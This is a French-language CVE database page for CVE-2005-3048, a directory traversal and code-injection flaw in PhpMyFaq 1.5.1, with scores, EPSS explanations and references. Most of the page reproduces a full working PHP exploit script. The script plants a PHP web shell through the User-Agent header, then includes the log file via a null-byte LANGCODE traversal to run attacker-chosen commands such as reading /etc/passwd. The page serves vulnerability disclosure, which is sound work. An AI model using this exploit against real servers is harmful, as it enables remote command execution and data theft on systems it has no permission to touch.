CVE-2005-3048 : Détail

CVE-2005-3048

1.24%V3
Network
2005-09-23
02h00 +00:00
2016-10-17
11h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Directory traversal vulnerability in index.php in PhpMyFaq 1.5.1 allows remote attackers to read arbitrary files or include arbitrary PHP files via a .. (dot dot) in the LANGCODE parameter, which also allows direct code injection via the User Agent field in a request packet, which can be activated by using LANGCODE to reference the user tracking data file.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 6.4 AV:N/AC:L/Au:N/C:P/I:P/A:N [email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 1226

Date de publication : 2005-09-22 22h00 +00:00
Auteur : rgod
EDB Vérifié : Yes

<?php # 17.34 22/09/2005 # # # # phpmyfaq_xpl.php # # # # PhpMyFaq 1.5.1 ( possibly prior versions) shell inject # # # # by rgod # # site: http://rgod.altervista.org # # # # make these changes in your php.ini if you have troubles # # to launch this script: # # allow_call_time_pass_reference = on # # register_globals = on # # # # usage: launch this script from Apache, fill requested fields, then # # if magic_quotes_gpc is off, boom! you launch commands... # # # # Sun-tzu: "When in difficult country, do not encamp. In country where high # # roads intersect, join hands with your allies. Do not linger in dangerously # # isolated positions. In hemmed-in situations, you must resort to stratagem. # # In desperate position, you must fight." # error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout", 2); ob_implicit_flush (1); echo'<head> <title> PhpMyFAQ 1.5.1 remote commands execution </title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <style type= "text/css"> <!-- body,td,th {color: #00FF00;} body {background-color: #000000;} .Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif; font-weight: bold; font-style: italic; } --> </style></head> <body> <p class="Stile6"> PhpMyFAQ V 1.5.1 (possibly prior versions) remote commands execution </p><p class="Stil e6">a script by rgod at <a href="http://rgod.altervista.org" target="_blank"> http://rgod.altervista.org</a></p><table width="84%"><tr><td width="43%"> <form name="form1" method="post" action="'.$SERVER[PHP_SELF].'?path=value&host= value&port=value&command=value&proxy=value"><p><input type="text" name="host"> <span class="Stile5"> hostname (ex: www.sitename.com) </span> </p> <p><input type="text" name="path"><span class="Stile5"> path ( ex: /phpmyfaq/ or just /) </span></p><p><input type="text" name="port" > <span class="Stile5"> specify a port other than 80 (default value) </span></p><p> <input type="text" name= "command"> <span class="Stile5"> a Unix command , example: ls -la to list directories, cat /etc/passwd to show passwd file </span></p><p><input type="text " name="proxy"> <span class="Stile5"> send exploit through an HTTP proxy (ip:por t</span></p> <p> <input type="submit"name="Submit" value="go!"></p></form></td> </tr></table></body></html>'; function show($headeri) { $ii=0; $ji=0; $ki=0; $ci=0; echo '<table border="0"><tr>'; while ($ii <= strlen($headeri)-1) { $datai=dechex(ord($headeri[$ii])); if ($ji==16) { $ji=0; $ci++; echo "<td>&nbsp;&nbsp;</td>"; for ($li=0; $li<=15; $li++) { echo "<td>".$headeri[$li+$ki]."</td>"; } $ki=$ki+16; echo "</tr><tr>"; } if (strlen($datai)==1) {echo "<td>0".$datai."</td>";} else {echo "<td>".$datai."</td> ";} $ii++; $ji++; } for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++) { echo "<td>&nbsp&nbsp</td>"; } for ($li=$ci*16; $li<=strlen($headeri); $li++) { echo "<td>".$headeri[$li]."</td>"; } echo "</tr></table>"; } $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; function sendpacket($packet) { global $proxy, $host, $port, $html; if ($proxy=='') {$ock=fsockopen(gethostbyname($host),$port);} else { if (!eregi($proxy_regex,$proxy)) {echo htmlentities($proxy).' -> not a valid proxy...'; die; } $parts=explode(':',$proxy); echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>'; $ock=fsockopen($parts[0],$parts[1]); if (!$ock) { echo 'No response from proxy...'; die; } } fputs($ock,$packet); if ($proxy=='') { $html=''; while (!feof($ock)) { $html.=fgets($ock); } } else { $html=''; while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($ock,1); } } fclose($ock); echo nl2br(htmlentities($html)); } if (($path<>'') and ($host<>'') and ($command<>'')) { if ($port=='') {$port=80;} # STEP 1 -> Shell Inject... if ($proxy=='') {$packet="GET ".$path."index.php?sid=49493&lang=it&action=ask HTTP/1.0 \r\n";} else {$packet="GET http://".$host.$path."index.php?sid=49493&lang=it&action=ask HTTP/1.0 \r\n";} $packet.='User-Agent: <?php system($HTTP_GET_VARS[cmd]) ?><?php die ?>'."\r\n"; //you cannot insert ";" because it is stripped, so insert more statements //if you change the shell, keep attemption to php syntax, if you make an error, //you cannot lauch commands till tomorrow, I am not joking ;) $packet.="Accept-Language: pl\r\n"; $packet.="Referer: http://".$host.$path."\r\n"; $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n"; $packet.="Accept-Encoding: gzip,deflate\r\n"; $packet.="Host: ".$host."\r\n\r\n"; $packet.="Connection: Close\r\n"; $packet.="Cookie: lang=it; sid=49493\r\n"; show($packet); sendpacket($packet); # STEP 2 -> Include the log file and launch commands... if ($proxy=='') {$packet="GET ".$path."index.php?cmd=".urlencode($command)."&LANGCODE=/../../data/tracking".date("dmY")."%00 HTTP/1.0 \r\n";} else {$packet="GET http://".$host.$path."index.php?cmd=".urlencode($command)."&LANGCODE=/../../data/tracking".date("dmY")."%00 HTTP/1.0 \r\n";} $packet.='User-Agent: Mozilla/5.0 (compatible; Konqueror/3.4; Linux) KHTML/3.4.2 (like Gecko)'."\r\n"; $packet.="Accept-Language: fr\r\n"; $packet.="Referer: http://".$host.$path."\r\n"; $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n"; $packet.="Accept-Encoding: gzip,deflate\r\n"; $packet.="Host: ".$host."\r\n\r\n"; $packet.="Connection: Close\r\n"; $packet.="Cookie: lang=it; sid=49493\r\n"; show($packet); sendpacket($packet); } else { echo '<br>fill in requested fields, optionally specify a proxy...<br><br>'; } ?> # milw0rm.com [2005-09-23]

Products Mentioned

Configuraton 0

Phpmyfaq>>Phpmyfaq >> Version 1.5.1

Références

http://www.osvdb.org/19672
Tags : vdb-entry, x_refsource_OSVDB
http://marc.info/?l=bugtraq&m=112749230124091&w=2
Tags : mailing-list, x_refsource_BUGTRAQ